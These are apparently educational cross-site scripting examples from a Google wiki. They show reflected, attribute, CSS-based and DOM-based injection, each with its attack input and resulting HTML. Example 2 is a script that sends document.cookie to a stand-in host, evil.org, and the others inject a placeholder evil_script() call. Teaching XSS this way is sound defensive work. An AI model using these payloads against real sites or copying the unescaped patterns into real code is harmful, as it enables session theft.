EXAMPLES FROM code.google.com/doctype/wiki

- 1 ---------------------------------------------------------------------

ATTACK:
http://www.mysite.com/search?q=flowers+%3Cscript%3Eevil_script()%3C/script%3E

RESULTING HTML:
<p>Your search for 'flowers <script>evil_script()</script>'
   returned the following results:</p>

- 2 ---------------------------------------------------------------------

<script>
  i=new Image();
  i.src="http://www.evil.org/snarf?cookie=" + escape(document.cookie);
</script>

- 3 ---------------------------------------------------------------------

<form:button ... onclick='GotoUrl("%(targetUrl)s");'>

ATTACK: supply targetURL       foo");evil_script("

RESULTING HTML: GotoUrl("foo");evil_script("");

- 4 ---------------------------------------------------------------------

<form ... <input name=q value="%(query)s"> </form>

ATTACK: supply query of        blah"><script>evil_script()</script>

RESULTING HTML:
<form ...
  <input name=q value="blah"><script>evil_script()</script>">
</form>

- 5 ---------------------------------------------------------------------

<div style="background: %(color)s;"> ... </div>

ATTACK: get color to contain     
   green; background-image: url(javascript:evil_script())

RESULTING HTML:
<div style="background: green; 
            background-image: url(javascript:evil_script());">
   ... </div>

- 6 ---------------------------------------------------------------------

Two different ways to edit an error message on a page:

- http://myapp.com/error.php?message=Sorry%2c+an+error+occured

- <script>
    var a = document.URL;
    a = unescape(a);
    document.write(a.substring(a.indexof("message")+8, a.length));
  </script>
  # this one extracts msg param from URL and inserts into page